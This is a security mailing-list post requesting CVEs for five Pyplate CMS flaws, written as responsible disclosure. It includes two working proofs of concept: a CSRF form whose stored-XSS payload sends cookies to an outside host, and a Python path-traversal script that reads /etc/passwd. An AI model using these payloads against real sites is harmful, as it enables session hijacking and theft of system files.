oss-sec mailing list archives
CVE request: Pyplate multiple vulnerabilities
From: Henri Salo <henri () nerv fi>
Date: Wed, 14 May 2014 14:21:21 +0300
Hello list, My friend Teemu V. "requested" security audit for Pyplate. While quickly checking quality of this software I noticed following issues. This is not a full security audit as I don't have much free time. Tested version: v0.08 (still beta) Vendor notification: 2014-05-13 Issue 1. Installation instruction tells user to execute following commands without checking any checksums or similar:
wget http://pyplate.com/pyplate_install.sh chmod +x ./pyplate_install.sh sudo ./pyplate_install.sh
Issue 2. File /usr/lib/cgi-bin/create_passwd_file.py creates passwd.db for admin user password with world readable permissions. I like that salt :] 20 salt="bla" 21 22 hash=crypt.crypt(random_string,'$6$'+salt+'$') 23 usercredentials="admin:"+hash 24 25 passwdf=open("./passwd.db",'w') 26 passwdf.write(usercredentials) 27 passwdf.close() -rw-r--r-- 1 www-data www-data 99 May 13 20:45 /usr/share/pyplate/passwd.db Issue 3. Application is not using HttpOnly (nor Secure) flag in cookie "id". Issue 4. CSRF + XSS with cookie stealing PoC: <html> <body> <form action="http://example.com/admin/addScript.py" method="POST"> <input type="hidden" name="title" value="<script>new Image().src="http://bugs.fi/evil.py?cookie=" encodeURI(document.cookie);</script>" /> <input type="hidden" name="file" value="bugs" /> <input type="hidden" name="category" value="/" /> <input type="hidden" name="post" value="<p>bugs</p> " /> <input type="hidden" name="tags" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="state" value="new" /> <input type="submit" value="Submit request" /> </form> </body> </html> There is no CSRF protection and most of admin functionality contain stored XSS issues. Issue 5. File /usr/lib/cgi-bin/download.py is used to download backup file from installation after admin has created it in web-ui. Note the comment. 21 # need to check that the filename doesn't contain slashes 26 path = pyplate.getCMSRoot() + "/backup/" + filename 27 file = open (path, 'rb') Normally HTTP POST message looks like: """ POST /cgi-bin/download.py HTTP/1.1 Host: 10.0.0.53 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.53/admin/manage_backups.py Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 40 filename=backup_2014.05.13.223720.tar.gz """ Attacker can use this without authentication to download arbitrary files from the system. File needs to be readable by web server process. PoC for /etc/passwd below: """ #!/usr/bin/env python # -*- coding: utf-8 -*- import requests payload = {'filename': '../../../../etc/passwd'} r = requests.post('http://example.org/cgi-bin/download.py', data=payload) print r.text """ If author responds with fixed in version I can coordinate this and send email to abuse@ address for all users (which is not that many currently). --- Henri Salo
Attachment:
signature.asc
Description: Digital signature
Current thread:
- CVE request: Pyplate multiple vulnerabilities Henri Salo (May 14)
- Re: CVE request: Pyplate multiple vulnerabilities cve-assign (May 23)